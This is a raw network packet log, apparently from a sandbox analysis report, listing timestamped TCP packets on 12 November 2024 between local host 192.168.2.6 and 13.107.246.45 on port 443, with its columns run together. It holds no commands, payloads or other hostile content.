                                                        Nov 12, 2024 16:27:45.929673910 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.929673910 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.929709911 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.929724932 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.934568882 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.934597015 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.934829950 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.934974909 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.934981108 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.963778973 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.963800907 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.963865042 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.963897943 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.964270115 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.964286089 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.964293957 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.964432955 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.964468002 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.964557886 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.967386961 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.967437983 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.967552900 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.967849970 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.967864037 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.588526011 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.588603973 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.590264082 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.590276003 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.590507030 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.591299057 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.635329962 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.722595930 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.722676039 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.723984957 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.724005938 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.724236012 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.725054026 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.741388083 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.741415024 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.741460085 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.741467953 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.741507053 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.741750956 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.741767883 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.741785049 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.741790056 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.747045040 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.747076988 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.747163057 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.747689009 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.747697115 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.767679930 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.767764091 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.770286083 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.770307064 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.770531893 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.771336079 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.772133112 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.815341949 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.856427908 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.856456041 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.856508970 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.856523991 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.856570959 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.867206097 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.867238998 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.867264032 CET49946443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.867269993 CET4434994613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.882222891 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.882270098 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:46.882343054 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.882541895 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:46.882558107 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.128864050 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.128931046 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.128994942 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.129235029 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.129267931 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.129287004 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.129295111 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.132086992 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.132122993 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.132222891 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.132344961 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.132358074 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.262198925 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.262274027 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.263542891 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.263554096 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.263763905 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.264611959 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.311325073 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.390160084 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.390222073 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.390458107 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.390491009 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.390510082 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.390518904 CET49945443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.390525103 CET4434994513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.393435001 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.393472910 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.393541098 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.393723011 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.393731117 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.482269049 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.482738018 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.482760906 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.483409882 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.483414888 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.618575096 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.618638039 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.618947029 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.618947029 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.618993044 CET49947443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.619004965 CET4434994713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.621817112 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.621855974 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.621964931 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.622064114 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.622076035 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.866380930 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.867432117 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.867432117 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.867477894 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.867496967 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.883372068 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.885050058 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.885050058 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:47.885066032 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:47.885077953 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.003766060 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.004776001 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.004822969 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.004848003 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.004925013 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.004925013 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.005034924 CET49948443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.005053043 CET4434994813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.007953882 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.007994890 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.008145094 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.008230925 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.008244991 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.011756897 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.011938095 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.012026072 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.012026072 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.012130022 CET49949443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.012142897 CET4434994913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.014046907 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.014084101 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.014204025 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.014296055 CET49953443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.014314890 CET4434995313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.141510963 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.142487049 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.142487049 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.142509937 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.142519951 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.280580997 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.280842066 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.280894041 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.280915976 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.280988932 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.280988932 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.281591892 CET49950443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.281605959 CET4434995013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.283804893 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.283862114 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.284015894 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.284096956 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.284102917 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.346457005 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.346985102 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.346999884 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.347489119 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.347497940 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.477216959 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.477511883 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.477631092 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.477631092 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.477798939 CET49951443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.477813959 CET4434995113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.480447054 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.480513096 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.480602980 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.480747938 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.480762959 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.780762911 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.781339884 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.781382084 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.781810999 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.781816959 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.916958094 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.917222977 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.917299032 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.917391062 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.917416096 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.917423010 CET49952443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.917428017 CET4434995213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.926821947 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.926872015 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:48.926942110 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.927171946 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:48.927187920 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.016839027 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.017417908 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.017440081 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.017952919 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.017960072 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.149800062 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.150136948 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.150192022 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.150233030 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.150253057 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.150258064 CET49954443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.150264025 CET4434995413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.153354883 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.153397083 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.153476954 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.153800011 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.153815031 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.229068041 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.229624033 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.229656935 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.230175972 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.230190992 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.361934900 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.361999989 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.362065077 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.362451077 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.362482071 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.362497091 CET49955443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.362503052 CET4434995513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.365621090 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.365662098 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.365722895 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.365884066 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.365891933 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.649080038 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.649754047 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.649816036 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.650382996 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.650388956 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.781761885 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.781790018 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.781846046 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.781866074 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.781908989 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.782203913 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.782227993 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.782244921 CET49956443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.782250881 CET4434995613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.785672903 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.785707951 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.785852909 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.786070108 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.786081076 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.898052931 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.904532909 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.904550076 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:49.904951096 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:49.904956102 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.032172918 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.032368898 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.032439947 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.032893896 CET49957443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.032912970 CET4434995713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.037796974 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.037858009 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.037974119 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.038436890 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.038450956 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.101216078 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.101948977 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.101984024 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.103018045 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.103024006 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.229814053 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.230417967 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.230463028 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.230482101 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.230525017 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.230731964 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.230746984 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.230758905 CET49958443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.230765104 CET4434995813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.235985994 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.236018896 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.236177921 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.236504078 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.236515999 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.560669899 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.561732054 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.561753988 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.562994957 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.563004971 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.907768011 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.907843113 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.907891989 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.908265114 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.908282042 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.908293009 CET49959443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.908298016 CET4434995913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.911256075 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.911302090 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:50.911583900 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.911874056 CET49962443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:50.911889076 CET4434996213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.032620907 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.033221960 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.033241034 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.033714056 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.033718109 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.040150881 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.040853977 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.040874958 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.041301966 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.041306019 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.168595076 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.168620110 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.168663979 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.168678999 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.168720007 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.169022083 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.169039011 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.169049025 CET49961443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.169054031 CET4434996113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.169492960 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.169661045 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.169729948 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.169877052 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.169898987 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.169910908 CET49960443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.169915915 CET4434996013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.172372103 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.172400951 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.172465086 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.172483921 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.172527075 CET4434996413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.172569036 CET49964443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.172698021 CET49963443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:51.172708035 CET4434996313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:51.172720909 CET49964443192.168.2.613.107.246.45
